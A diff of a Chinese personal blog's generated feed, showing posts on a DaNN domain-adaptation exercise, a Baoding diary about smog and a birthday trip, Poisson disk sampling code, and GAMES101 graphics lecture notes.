    epoch 155: train D loss: 0.3950, train F loss: 0.0180, acc 0.9808
    epoch 156: train D loss: 0.4017, train F loss: 0.0205, acc 0.9808
    epoch 157: train D loss: 0.3952, train F loss: 0.0484, acc 0.9734
    epoch 158: train D loss: 0.3885, train F loss: 0.0346, acc 0.9776
    epoch 159: train D loss: 0.3916, train F loss: 0.0202, acc 0.9812
    epoch 160: train D loss: 0.3980, train F loss: 0.0306, acc 0.9774
    epoch 161: train D loss: 0.3897, train F loss: 0.0306, acc 0.9800
    epoch 162: train D loss: 0.3909, train F loss: 0.0164, acc 0.9816
    epoch 163: train D loss: 0.3911, train F loss: 0.0273, acc 0.9806
    epoch 164: train D loss: 0.3737, train F loss: 0.0133, acc 0.9830
    epoch 165: train D loss: 0.4064, train F loss: 0.0520, acc 0.9706
    epoch 166: train D loss: 0.3951, train F loss: 0.0242, acc 0.9810
    epoch 167: train D loss: 0.3865, train F loss: 0.0287, acc 0.9810
    epoch 168: train D loss: 0.3921, train F loss: 0.0141, acc 0.9814
    epoch 169: train D loss: 0.3862, train F loss: 0.0130, acc 0.9836
    epoch 170: train D loss: 0.4018, train F loss: 0.0273, acc 0.9764
    epoch 171: train D loss: 0.4053, train F loss: 0.0254, acc 0.9774
    epoch 172: train D loss: 0.4040, train F loss: 0.0169, acc 0.9810
    epoch 173: train D loss: 0.3935, train F loss: 0.0463, acc 0.9734
    epoch 174: train D loss: 0.3991, train F loss: 0.0199, acc 0.9804
    epoch 175: train D loss: 0.3919, train F loss: 0.0275, acc 0.9800
    epoch 176: train D loss: 0.4021, train F loss: 0.0315, acc 0.9780
    epoch 177: train D loss: 0.3856, train F loss: 0.0289, acc 0.9796
    epoch 178: train D loss: 0.3880, train F loss: 0.0171, acc 0.9812
    epoch 179: train D loss: 0.3874, train F loss: 0.0200, acc 0.9824
    epoch 180: train D loss: 0.3974, train F loss: 0.0243, acc 0.9826
    epoch 181: train D loss: 0.3981, train F loss: 0.0191, acc 0.9812
    epoch 182: train D loss: 0.4048, train F loss: 0.0159, acc 0.9822
    epoch 183: train D loss: 0.3929, train F loss: 0.0212, acc 0.9796
    epoch 184: train D loss: 0.3944, train F loss: 0.0130, acc 0.9822
    epoch 185: train D loss: 0.3895, train F loss: 0.0402, acc 0.9752
    epoch 186: train D loss: 0.3849, train F loss: 0.0136, acc 0.9826
    epoch 187: train D loss: 0.3791, train F loss: 0.0222, acc 0.9814
    epoch 188: train D loss: 0.3990, train F loss: 0.0190, acc 0.9812
    epoch 189: train D loss: 0.3964, train F loss: 0.0317, acc 0.9794
    epoch 190: train D loss: 0.3935, train F loss: 0.0385, acc 0.9788
    epoch 191: train D loss: 0.3914, train F loss: 0.0218, acc 0.9812
    epoch 192: train D loss: 0.3764, train F loss: 0.0212, acc 0.9822
    epoch 193: train D loss: 0.3782, train F loss: 0.0193, acc 0.9836
    epoch 194: train D loss: 0.3787, train F loss: 0.0111, acc 0.9832
    epoch 195: train D loss: 0.4000, train F loss: 0.0239, acc 0.9808
    epoch 196: train D loss: 0.3830, train F loss: 0.0201, acc 0.9836
    epoch 197: train D loss: 0.4085, train F loss: 0.0230, acc 0.9802
    epoch 198: train D loss: 0.3908, train F loss: 0.0197, acc 0.9802
    epoch 199: train D loss: 0.3981, train F loss: 0.0170, acc 0.9820

    绘制图表:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    import re
    import matplotlib.pyplot as plt

    # 你的字符串数据
    data = """
    epoch 0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
    epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
    epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
    epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
    ...
    """

    # 使用正则表达式提取数据
    pattern = r"epoch\s+(\d+): train D loss: ([\d.]+), train F loss: ([\d.]+), acc ([\d.]+)"
    matches = re.findall(pattern, data)

    # 转换数据格式
    epochs = []
    d_losses = []
    f_losses = []
    accuracies = []

    for match in matches:
    epoch, d_loss, f_loss, acc = map(float, match)
    epochs.append(int(epoch))
    d_losses.append(d_loss)
    f_losses.append(f_loss)
    accuracies.append(acc)

    # 绘制图表
    plt.figure(figsize=(10, 6))

    # 绘制 D loss 和 F loss
    plt.subplot(2, 1, 1)
    plt.plot(epochs, d_losses, label='D Loss', color='blue')
    plt.plot(epochs, f_losses, label='F Loss', color='orange')
    plt.xlabel('Epoch')
    plt.ylabel('Loss')
    plt.title('Train Losses Over Epochs')
    plt.legend()

    # 绘制 Accuracy
    plt.subplot(2, 1, 2)
    plt.plot(epochs, accuracies, label='Accuracy', color='green')
    plt.xlabel('Epoch')
    plt.ylabel('Accuracy')
    plt.title('Accuracy Over Epochs')
    plt.legend()

    plt.tight_layout()
    plt.show()

    png

    推理

    ​我们使用 pandas 生成 csv 文件。

    ​顺便说一句,训练 200 个 epoch 的模型的性能可能不稳定。您可以训练更多 epoch 以获得更稳定的性能。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    # 初始化和设置模型为评估模式
    result = []
    label_predictor.eval()
    feature_extractor.eval()

    # 循环遍历测试数据并进行预测
    for i, (test_data, _) in enumerate(test_dataloader):
    test_data = test_data.cuda()

    class_logits = label_predictor(feature_extractor(test_data))

    x = torch.argmax(class_logits, dim=1).cpu().detach().numpy()
    result.append(x)

    import pandas as pd
    result = np.concatenate(result)

    # Generate your submission
    # 合并预测结果
    df = pd.DataFrame({'id': np.arange(0,len(result)), 'label': result})
    df.to_csv('DaNN_submission.csv',index=False)

    可视化

    ​我们使用 t-SNE 图来观察提取特征的分布。

    1
    2
    3
    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import manifold
    ]]>
    @@ -4148,7 +4148,7 @@ /posts/Diary-5-%E6%9B%B4%E5%AF%92%E9%A3%8E%E4%B8%8E%E6%9B%B4%E9%9B%BE%E9%9C%BE/ - 前言

    jpg

    梧桐与银杏

    ​ 靠近梧桐的几棵银杏树死活不黄。


    ​ 保定气候播报:

    # y 轴数据(假设为温度和 PM 值)
    y1 = [7, 7, 8, 8, 5, 7, 4, -2, 0, 3, -5, -4, -7] # 当日最低温
    y2 = [22, 25, 25, 24, 17, 18, 16, 12, 12, 15, 9, 6, 7] # 当日最高温
    y3 = [227, 237, 279, 265, 51, 71, 40, 59, 67, 85, 18, 23, 52] # 当日 PM 值

    png

    ​ 大概是气温变化最大的两周了。


    ​ 本次博客添加了新的 html 效果,真是太棒了!

    正文

    10.30

    ​ 大概是暖气点火的原因,雾霾依旧十分严重。

    10.31

    好消息各位!外面是人间仙境!

    jpg

    瞎了

    ​ 清早起来,好一片繁华景象!

    jpg

    河北特产

    ​ 我觉得这种霾已经超出了 PS 去霾的范畴了。

    ​【温馨提示】各位同学好:保定市气象台发布了大雾红色预警,10 月 31 日 19 时已启动重大气象灾害(大雾)三级应急响应,请转发给各班级提醒同学:增强安全防范意识,谨慎出行,如有外出务必遵守交通规则,确保安全。

    11.1

    ​ 组会时间。随着新研一的到来,导师让研三的师兄先汇报分享他们的工作进展,结果师兄讲了卷积神经网络讲了快两小时,困死我了呜呜呜,而且感觉师兄的工作好水 emmmm,就是个空洞卷积插入 CycleGAN 中,效果看上去也不是太好……也没有对比实验。

    说师兄大水货是不是
    笑死
    确实水
    但也比我好点

    11.2

     

    ​ 凡哥迷上了《完蛋!我被美女包围了!》游戏,大早上不去实验室搁着打游戏呢。结果检查宿舍的人看门没锁就进来检查宿舍了,二话不说把热水壶收走了,喜提 n 天不能泡脚。明明热水壶插在空调的插头上根本不会有用电安全的问题啊?实在接受不了这种侵占学生财产的行为,于是便探讨了一下福州闽南优美脏话文化。

    气死我了
    送他一堆优美福州话
    赛尼内
    是撒女内
    你这福州闽南混合型
    哈哈哈
    之前听舍友说过
    再送检察员一句赛林北

    ​ 探讨结束。转手又买了个新的烧水壶。

    11.3

    好消息各位!雾霾结束了!

    ​ 雾霾结束了,即将到来的就是大幅降温,可能是冷空气把雾霾吹跑了吧。

    jpg

    还没去年这时候黄

    ​ 这张照片显示这个时候银杏还有些许绿色,但是随着冷空气下来,银杏马上就变得满是金黄,引来许多学生来银杏树下拍照。

    11.5

    好消息各位!保定终于下雨了!

    ​ 早上还下起了雨,早已没有包背后放把伞的我发现把伞拉实验室了,于是又去小卖部再买了一把。


    jpg

    抽水泵

    ​ 大概是害怕湖面结冰学生瞎玩酿成事故,冀大开始抽干图书馆门前的小池塘了,可爱小鸭鸭要另寻他处了。


    jpg

    掉漆了喂!

    ​ 傍晚散步时间。东湖公园逛腻了,去走走巨力大桥吧。

    jpg

    桥上中国保定,桥下一片农田

    jpg

    东风路

    ​ 东风路西起乐凯大街、东至聚贤街,全长 12.3 km。自西向东串联了保定“八大厂”、“老城区”、“高铁站”等城市地标,记载着“老保定”,承载着“新保定”,昭示着“未来保定”。是保定的“城市人文轴线”,也是保定的“城市形象展示大道”。
    ​ 经过更新的东风路拥有了安全顺畅的慢行系统、整洁有序的建筑立面、风景优美的街道绿化,高效便捷的静态交通以及实用美观的市政设施、成为保定建设现代化品质生活之城,展现城市“新颜值”的一张靓丽名片。

    ​ 保定的公路修得笔直,七一路和东风路两条大路横跨整个保定城。

    jpg

    上不去路,只好原路返回

    ​ 本来想走到收费站去看看的,但是找不到好的拍摄机位,只好就此作罢。

    jpg

    K3 路

    ​ 走累了,坐公交车回冀大。保定的公交车太少了,等了快半小时才等上。

    11.6

    好消息各位!最低气温跌破冰点!

    ​ 保定的最低气温来到了零下,而厦门的最高温却高达 31 ℃!

    热死了
    零下了
    今天 31 度
    -2

    ​ 为什么这个时候还会有苍蝇啊!实验室里有好几只苍蝇在乱飞,估计是觉得室内暖和就全来室内了。


    ​ 午睡的床铺变得十分香甜,都不想起来了。


    ​ 北京开始供暖了,而保定估计还是 11.15?其实还好,除了大晚上骑电驴有点冷,室内还是处于可以接受的范围。

    真开供暖了
    屋里 20 度
    京爷先享受
    羡慕京✌️
    冀佬冻着
    还是地暖✌️

    11.7

    ​ 经过将近一个月的调试,又要把生成的数据送进炼丹炉了。一共需要 10000 张图片,而生成 1000 多张时电脑就会崩溃重启一次,每次启动又要将近 10 分钟,给我气笑了。

    11.8

    ​ 组会又给我干困了……导师说研二要抓紧时间了,马上研究生生活就要过半了。可是实验效果还是不太行啊,可恶!

    11.9

    ​ 实验效果不太好,又想开摆了。


    ​ 今天的空气特别好,好评!

    jpg

    这么好的空气不出去散步都对不起它

    ​ 东湖上的鸭鸭。

    11.10

    jpg

    过半

    ​ 这个学期即将过半了!


    jpg

    霜叶红于二月花

    ​ 冀大的树有红有黄有绿。


    ​ 又要到周末了!之前的生日都很平淡不怎么想过:

    • 15 年生日跟爸爸妈妈爷爷奶奶去茶亭附近吃了顿肉蟹煲。

    • 16 年生日是一点也不记得了。

    • 17 年的生日在月考,考的生物和英语,考得一塌糊涂。

    • 18 年生日记得前一天学院开迎新晚会,然后就顺势熬夜到 0 点当过生日了。

    • 19 年生日跟舍友去西门破街整了点地摊小吃,然后去华丰贺氏整了个蛋糕。

    • 20 年生日是一点也不记得了。

    • 21 年生日那段时间在准备考研,奖励自己上午没做数学卷子,傍晚跟小迷糊小小怪吃了顿黄焖鸡。

    • 22 年生日那天刚好不用测核酸,在实验室里写 Unity 玩。


    ​ 在 24 岁生日即将到来,突然想折腾一把。

    ​ 之前舍友想去雄安看招聘会,于是我规划了一下,陪他们参观后就直接白洋淀站坐去石家庄了,体验一下一个人旅行自由自在的感觉。

    下周见
    好家伙
    周末要润去石家庄了啊
    过个生日
    可以可以

    jpg

    忍你很久了,可爱小苍蝇!

    ​ 在实验室埋伏好粘蝇纸,下周见 324!

    11.11-11.12

    陪舍友去雄安
    然后下午我就去石家庄
    我去
    业务繁忙

    ​ Happy weekend!

    ​ 从石家庄回来后,遵守之前的约定,去未来石整顿火锅。

    jpg

    火锅

    ​ 感觉只要是火锅就不会不好吃,而且我特别喜欢这家店的自助甜品。

    jpg

    抓娃娃

    ​ 吃完饭去抓娃娃,50 块钱 p 也没抓到,最后还把抓娃娃机卡坏了……

    ]]>
    + 前言

    jpg

    梧桐与银杏

    ​ 靠近梧桐的几棵银杏树死活不黄。


    ​ 保定气候播报:

    1
    2
    3
    4
    # y 轴数据(假设为温度和 PM 值)
    y1 = [7, 7, 8, 8, 5, 7, 4, -2, 0, 3, -5, -4, -7] # 当日最低温
    y2 = [22, 25, 25, 24, 17, 18, 16, 12, 12, 15, 9, 6, 7] # 当日最高温
    y3 = [227, 237, 279, 265, 51, 71, 40, 59, 67, 85, 18, 23, 52] # 当日 PM 值

    png

    ​ 大概是气温变化最大的两周了。


    ​ 本次博客添加了新的 html 效果,真是太棒了!

    正文

    10.30

    ​ 大概是暖气点火的原因,雾霾依旧十分严重。

    10.31

    好消息各位!外面是人间仙境!

    jpg

    瞎了

    ​ 清早起来,好一片繁华景象!

    jpg

    河北特产

    ​ 我觉得这种霾已经超出了 PS 去霾的范畴了。

    ​【温馨提示】各位同学好:保定市气象台发布了大雾红色预警,10 月 31 日 19 时已启动重大气象灾害(大雾)三级应急响应,请转发给各班级提醒同学:增强安全防范意识,谨慎出行,如有外出务必遵守交通规则,确保安全。

    11.1

    ​ 组会时间。随着新研一的到来,导师让研三的师兄先汇报分享他们的工作进展,结果师兄讲了卷积神经网络讲了快两小时,困死我了呜呜呜,而且感觉师兄的工作好水 emmmm,就是个空洞卷积插入 CycleGAN 中,效果看上去也不是太好……也没有对比实验。

    说师兄大水货是不是
    笑死
    确实水
    但也比我好点

    11.2

     

    ​ 凡哥迷上了《完蛋!我被美女包围了!》游戏,大早上不去实验室搁着打游戏呢。结果检查宿舍的人看门没锁就进来检查宿舍了,二话不说把热水壶收走了,喜提 n 天不能泡脚。明明热水壶插在空调的插头上根本不会有用电安全的问题啊?实在接受不了这种侵占学生财产的行为,于是便探讨了一下福州闽南优美脏话文化。

    气死我了
    送他一堆优美福州话
    赛尼内
    是撒女内
    你这福州闽南混合型
    哈哈哈
    之前听舍友说过
    再送检察员一句赛林北

    ​ 探讨结束。转手又买了个新的烧水壶。

    11.3

    好消息各位!雾霾结束了!

    ​ 雾霾结束了,即将到来的就是大幅降温,可能是冷空气把雾霾吹跑了吧。

    jpg

    还没去年这时候黄

    ​ 这张照片显示这个时候银杏还有些许绿色,但是随着冷空气下来,银杏马上就变得满是金黄,引来许多学生来银杏树下拍照。

    11.5

    好消息各位!保定终于下雨了!

    ​ 早上还下起了雨,早已没有包背后放把伞的我发现把伞拉实验室了,于是又去小卖部再买了一把。


    jpg

    抽水泵

    ​ 大概是害怕湖面结冰学生瞎玩酿成事故,冀大开始抽干图书馆门前的小池塘了,可爱小鸭鸭要另寻他处了。


    jpg

    掉漆了喂!

    ​ 傍晚散步时间。东湖公园逛腻了,去走走巨力大桥吧。

    jpg

    桥上中国保定,桥下一片农田

    jpg

    东风路

    ​ 东风路西起乐凯大街、东至聚贤街,全长 12.3 km。自西向东串联了保定“八大厂”、“老城区”、“高铁站”等城市地标,记载着“老保定”,承载着“新保定”,昭示着“未来保定”。是保定的“城市人文轴线”,也是保定的“城市形象展示大道”。
    ​ 经过更新的东风路拥有了安全顺畅的慢行系统、整洁有序的建筑立面、风景优美的街道绿化,高效便捷的静态交通以及实用美观的市政设施、成为保定建设现代化品质生活之城,展现城市“新颜值”的一张靓丽名片。

    ​ 保定的公路修得笔直,七一路和东风路两条大路横跨整个保定城。

    jpg

    上不去路,只好原路返回

    ​ 本来想走到收费站去看看的,但是找不到好的拍摄机位,只好就此作罢。

    jpg

    K3 路

    ​ 走累了,坐公交车回冀大。保定的公交车太少了,等了快半小时才等上。

    11.6

    好消息各位!最低气温跌破冰点!

    ​ 保定的最低气温来到了零下,而厦门的最高温却高达 31 ℃!

    热死了
    零下了
    今天 31 度
    -2

    ​ 为什么这个时候还会有苍蝇啊!实验室里有好几只苍蝇在乱飞,估计是觉得室内暖和就全来室内了。


    ​ 午睡的床铺变得十分香甜,都不想起来了。


    ​ 北京开始供暖了,而保定估计还是 11.15?其实还好,除了大晚上骑电驴有点冷,室内还是处于可以接受的范围。

    真开供暖了
    屋里 20 度
    京爷先享受
    羡慕京✌️
    冀佬冻着
    还是地暖✌️

    11.7

    ​ 经过将近一个月的调试,又要把生成的数据送进炼丹炉了。一共需要 10000 张图片,而生成 1000 多张时电脑就会崩溃重启一次,每次启动又要将近 10 分钟,给我气笑了。

    11.8

    ​ 组会又给我干困了……导师说研二要抓紧时间了,马上研究生生活就要过半了。可是实验效果还是不太行啊,可恶!

    11.9

    ​ 实验效果不太好,又想开摆了。


    ​ 今天的空气特别好,好评!

    jpg

    这么好的空气不出去散步都对不起它

    ​ 东湖上的鸭鸭。

    11.10

    jpg

    过半

    ​ 这个学期即将过半了!


    jpg

    霜叶红于二月花

    ​ 冀大的树有红有黄有绿。


    ​ 又要到周末了!之前的生日都很平淡不怎么想过:

    • 15 年生日跟爸爸妈妈爷爷奶奶去茶亭附近吃了顿肉蟹煲。

    • 16 年生日是一点也不记得了。

    • 17 年的生日在月考,考的生物和英语,考得一塌糊涂。

    • 18 年生日记得前一天学院开迎新晚会,然后就顺势熬夜到 0 点当过生日了。

    • 19 年生日跟舍友去西门破街整了点地摊小吃,然后去华丰贺氏整了个蛋糕。

    • 20 年生日是一点也不记得了。

    • 21 年生日那段时间在准备考研,奖励自己上午没做数学卷子,傍晚跟小迷糊小小怪吃了顿黄焖鸡。

    • 22 年生日那天刚好不用测核酸,在实验室里写 Unity 玩。


    ​ 在 24 岁生日即将到来,突然想折腾一把。

    ​ 之前舍友想去雄安看招聘会,于是我规划了一下,陪他们参观后就直接白洋淀站坐去石家庄了,体验一下一个人旅行自由自在的感觉。

    下周见
    好家伙
    周末要润去石家庄了啊
    过个生日
    可以可以

    jpg

    忍你很久了,可爱小苍蝇!

    ​ 在实验室埋伏好粘蝇纸,下周见 324!

    11.11-11.12

    陪舍友去雄安
    然后下午我就去石家庄
    我去
    业务繁忙

    ​ Happy weekend!

    ​ 从石家庄回来后,遵守之前的约定,去未来石整顿火锅。

    jpg

    火锅

    ​ 感觉只要是火锅就不会不好吃,而且我特别喜欢这家店的自助甜品。

    jpg

    抓娃娃

    ​ 吃完饭去抓娃娃,50 块钱 p 也没抓到,最后还把抓娃娃机卡坏了……

    ]]>
    @@ -4175,7 +4175,7 @@ /posts/Paper-Fast%20Poisson%20Disk%20Sampling%20in%20Arbitrary%20Dimensions/ - 资源

    原文

    Abstract

    在图形的许多应用中,特别是渲染中,从蓝色噪声分布生成样本是很重要的。然而,现有的有效技术不容易推广到二维之外。在这里,我演示了对飞镖投掷的一个简单修改,它允许在 $O(N)$ 时间内生成泊松圆盘样本,可以在任意维度中轻松实现。

    1 Introduction

    在这个草图中,我提出了一种新的算法,可以在任意维度上轻松实现,它保证需要 $O(N)$ 时间来生成 $N$ 个泊松圆盘样本。

    2 The Algorithm

    该算法将 $\mathbf R^n$ 中的样本域的范围、样本之间的最小距离 $r$ 以及常数 $k$ 作为在算法中拒绝之前要选择的样本的极限(通常 $k=30$)作为输入。

    Step0 初始化用于存储样本和加速空间搜索的 $n$ 维背景网格。我们选择以 $r/\sqrt n$ 为界的单元格大小,这样每个网格单元格最多包含一个样本,因此网格可以实现为一个简单的二维整数数组:默认的 $−1$ 表示没有样本,非负整数给出位于单元格中的样本的索引。

    Step1 从域中随机均匀选择初始样本 $x_0$ 从域中随机选择。将其插入背景网格,并以该索引(零)初始化“活动列表”(一个样本索引数组)。活动列表"(样本索引数组)的初始化。

    Step2 当活动列表不为空时,从中选择一个随机索引(比如 $i$)。生成从 $x_i$ 周围半径 $r$ 和 $2r$ 之间的球面环中均匀选择的多达 $k$ 个点。依次检查每个点是否在现有样本的距离 $r$ 内(使用背景网格仅测试附近的样本)。如果某个点距离现有采样足够远,则将其作为下一个采样发射,并将其添加到活动列表中。如果在 $k$ 次尝试之后没有找到这样的点,则将 $i$ 从活动列表中删除。

    3 Analysis

    Step2 执行 $2N−1$ 次,产生 $N$ 个样本:每次迭代要么产生一个新样本并将其添加到活动列表中,要么从活动列表中删除一个现有样本。Step2 的每次迭代花费 $O(k)$ 时间,并且由于 $k$ 保持恒定(通常非常小),因此算法是线性的。

    代码

    import numpy as np
    import matplotlib.pyplot as plt

    r = 1 # 样本间的最小距离
    d = r / np.sqrt(2) # 单元格大小
    k = 30 # 算法中拒绝之前要选择的样本的极限
    width = 20 # 样本域宽
    height = 16 # 样本域高

    # 将网格实现为一个简单的二维数组
    nx = int(width / d) + 1
    ny = int(height / d) + 1
    occupied = np.zeros((ny, nx)) # 用于记录网格是否被占用
    occupied_coord = np.zeros((ny, nx, 2)) # 记录每个被占用网格对应的坐标
    active_list = [] # 待处理点集
    sampled = [] # 已经采样的点集

    # 定义了一个相对坐标矩阵 relative,它包含了一个中心点和其周围 18 个格点的相对坐标。
    relative = np.array([[-1, 2], [0, 2], [1, 2],
    [-2, 1], [-1, 1], [0, 1], [1, 1], [2, 1],
    [-2, 0], [-1, 0], [1, 0], [2, 0],
    [-2, -1], [-1, -1], [0, -1], [1, -1], [2, -1],
    [-1, -2], [0, -2], [1, -2]])
    np.random.seed(0)
    # 使用 numpy.random.rand 函数生成一个随机的初始点,并将其添加到相应的数组中
    x, y = np.random.rand() * width, np.random.rand() * height
    idx_x, idx_y = int(x / d), int(y / d)
    occupied[idx_y, idx_x] = 1
    occupied_coord[idx_y, idx_x] = (x, y)
    active_list.append((x, y))
    sampled.append((x, y))

    sampled_idx = 0

    while len(active_list) > 0: # 当活动列表不为空时
    idx = np.random.choice(np.arange(len(active_list))) # 选择一个随机索引, 比如 i
    # 生成从 x_i 周围半径 r 和 2r 之间的球面环中均匀选择的多达 k 个点
    ref_x, ref_y = active_list[idx]
    radius = (np.random.rand(k) + 1) * r
    theta = np.random.rand(k) * np.pi * 2
    candidate = radius * np.cos(theta) + ref_x, radius * np.sin(theta) + ref_y
    flag_out = False
    for _x, _y in zip(*candidate):
    # 依次检查每个点是否在现有样本的距离 r 内
    if _x < 0 or _x > width or _y < 0 or _y > height:
    continue
    # other geo constraints
    flag = True
    idx_x, idx_y = int(_x / d), int(_y / d)
    if occupied[idx_y, idx_x] != 0:
    continue
    else:
    neighbours = relative + np.array([idx_x, idx_y])
    for cand_x, cand_y in neighbours:
    # 检查其坐标是否超出画布范围。如果超出,则跳过该点
    if cand_x < 0 or cand_x >= nx or cand_y < 0 or cand_y >= ny:
    continue
    if occupied[cand_y, cand_x] == 1:
    # 找到该网格对应的点
    cood = occupied_coord[cand_y, cand_x]
    # 计算该网格对应的点与候选点之间的距离,如果小于最小半径 r,则说明候选点不满足几何约束条件,需要舍弃
    if (_x - cood[0]) ** 2 + (_y - cood[1]) ** 2 < r ** 2:
    flag = False
    break
    if flag: # 将该点标记为已占据,并添加到已采样点集和活动列表中。
    flag_out = True
    occupied[idx_y, idx_x] = 1
    occupied_coord[idx_y, idx_x] = (_x, _y)
    sampled.append((_x, _y))
    active_list.append((_x, _y))
    sampled_idx += 1
    break
    if not flag_out: # 如果在 k 次尝试之后没有找到这样的点,则将 i 从活动列表中删除
    active_list.pop(idx)

    fig, ax = plt.subplots(1, 1, figsize=(9, 6))
    fig.set_tight_layout(True)
    ax.scatter(*zip(*sampled), c='g')
    ax.set_xlim([0, width])
    ax.set_ylim([0, height])
    plt.show()
    ]]>
    + 资源

    原文

    Abstract

    在图形的许多应用中,特别是渲染中,从蓝色噪声分布生成样本是很重要的。然而,现有的有效技术不容易推广到二维之外。在这里,我演示了对飞镖投掷的一个简单修改,它允许在 $O(N)$ 时间内生成泊松圆盘样本,可以在任意维度中轻松实现。

    1 Introduction

    在这个草图中,我提出了一种新的算法,可以在任意维度上轻松实现,它保证需要 $O(N)$ 时间来生成 $N$ 个泊松圆盘样本。

    2 The Algorithm

    该算法将 $\mathbf R^n$ 中的样本域的范围、样本之间的最小距离 $r$ 以及常数 $k$ 作为在算法中拒绝之前要选择的样本的极限(通常 $k=30$)作为输入。

    Step0 初始化用于存储样本和加速空间搜索的 $n$ 维背景网格。我们选择以 $r/\sqrt n$ 为界的单元格大小,这样每个网格单元格最多包含一个样本,因此网格可以实现为一个简单的二维整数数组:默认的 $−1$ 表示没有样本,非负整数给出位于单元格中的样本的索引。

    Step1 从域中随机均匀选择初始样本 $x_0$ 从域中随机选择。将其插入背景网格,并以该索引(零)初始化“活动列表”(一个样本索引数组)。活动列表"(样本索引数组)的初始化。

    Step2 当活动列表不为空时,从中选择一个随机索引(比如 $i$)。生成从 $x_i$ 周围半径 $r$ 和 $2r$ 之间的球面环中均匀选择的多达 $k$ 个点。依次检查每个点是否在现有样本的距离 $r$ 内(使用背景网格仅测试附近的样本)。如果某个点距离现有采样足够远,则将其作为下一个采样发射,并将其添加到活动列表中。如果在 $k$ 次尝试之后没有找到这样的点,则将 $i$ 从活动列表中删除。

    3 Analysis

    Step2 执行 $2N−1$ 次,产生 $N$ 个样本:每次迭代要么产生一个新样本并将其添加到活动列表中,要么从活动列表中删除一个现有样本。Step2 的每次迭代花费 $O(k)$ 时间,并且由于 $k$ 保持恒定(通常非常小),因此算法是线性的。

    代码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    import numpy as np
    import matplotlib.pyplot as plt

    r = 1 # 样本间的最小距离
    d = r / np.sqrt(2) # 单元格大小
    k = 30 # 算法中拒绝之前要选择的样本的极限
    width = 20 # 样本域宽
    height = 16 # 样本域高

    # 将网格实现为一个简单的二维数组
    nx = int(width / d) + 1
    ny = int(height / d) + 1
    occupied = np.zeros((ny, nx)) # 用于记录网格是否被占用
    occupied_coord = np.zeros((ny, nx, 2)) # 记录每个被占用网格对应的坐标
    active_list = [] # 待处理点集
    sampled = [] # 已经采样的点集

    # 定义了一个相对坐标矩阵 relative,它包含了一个中心点和其周围 18 个格点的相对坐标。
    relative = np.array([[-1, 2], [0, 2], [1, 2],
    [-2, 1], [-1, 1], [0, 1], [1, 1], [2, 1],
    [-2, 0], [-1, 0], [1, 0], [2, 0],
    [-2, -1], [-1, -1], [0, -1], [1, -1], [2, -1],
    [-1, -2], [0, -2], [1, -2]])
    np.random.seed(0)
    # 使用 numpy.random.rand 函数生成一个随机的初始点,并将其添加到相应的数组中
    x, y = np.random.rand() * width, np.random.rand() * height
    idx_x, idx_y = int(x / d), int(y / d)
    occupied[idx_y, idx_x] = 1
    occupied_coord[idx_y, idx_x] = (x, y)
    active_list.append((x, y))
    sampled.append((x, y))

    sampled_idx = 0

    while len(active_list) > 0: # 当活动列表不为空时
    idx = np.random.choice(np.arange(len(active_list))) # 选择一个随机索引, 比如 i
    # 生成从 x_i 周围半径 r 和 2r 之间的球面环中均匀选择的多达 k 个点
    ref_x, ref_y = active_list[idx]
    radius = (np.random.rand(k) + 1) * r
    theta = np.random.rand(k) * np.pi * 2
    candidate = radius * np.cos(theta) + ref_x, radius * np.sin(theta) + ref_y
    flag_out = False
    for _x, _y in zip(*candidate):
    # 依次检查每个点是否在现有样本的距离 r 内
    if _x < 0 or _x > width or _y < 0 or _y > height:
    continue
    # other geo constraints
    flag = True
    idx_x, idx_y = int(_x / d), int(_y / d)
    if occupied[idx_y, idx_x] != 0:
    continue
    else:
    neighbours = relative + np.array([idx_x, idx_y])
    for cand_x, cand_y in neighbours:
    # 检查其坐标是否超出画布范围。如果超出,则跳过该点
    if cand_x < 0 or cand_x >= nx or cand_y < 0 or cand_y >= ny:
    continue
    if occupied[cand_y, cand_x] == 1:
    # 找到该网格对应的点
    cood = occupied_coord[cand_y, cand_x]
    # 计算该网格对应的点与候选点之间的距离,如果小于最小半径 r,则说明候选点不满足几何约束条件,需要舍弃
    if (_x - cood[0]) ** 2 + (_y - cood[1]) ** 2 < r ** 2:
    flag = False
    break
    if flag: # 将该点标记为已占据,并添加到已采样点集和活动列表中。
    flag_out = True
    occupied[idx_y, idx_x] = 1
    occupied_coord[idx_y, idx_x] = (_x, _y)
    sampled.append((_x, _y))
    active_list.append((_x, _y))
    sampled_idx += 1
    break
    if not flag_out: # 如果在 k 次尝试之后没有找到这样的点,则将 i 从活动列表中删除
    active_list.pop(idx)

    fig, ax = plt.subplots(1, 1, figsize=(9, 6))
    fig.set_tight_layout(True)
    ax.scatter(*zip(*sampled), c='g')
    ax.set_xlim([0, width])
    ax.set_ylim([0, height])
    plt.show()
    ]]>
    @@ -4231,7 +4231,7 @@ /posts/GAMES101-%E7%8E%B0%E4%BB%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9B%BE%E5%BD%A2%E5%AD%A6%E5%85%A5%E9%97%A8-%E9%97%AB%E4%BB%A4%E7%90%AA%EF%BC%882%EF%BC%89/ - 资源

    课程

    Lecture 05 Rasterization 1 (Triangles)

    Perspective Projection 透视投影

    • What’s near plane’s $l, r, b, t$ then?

      那么,near 平面的 $l,r,b,t$ 是什么?

      • If explicitly specified, good

        如果有明确规定,这很好

      • Sometimes people prefer: vertical field-of-view (fovY) and aspect ratio (assume symmetry i.e. $l = -r, b = -t$)

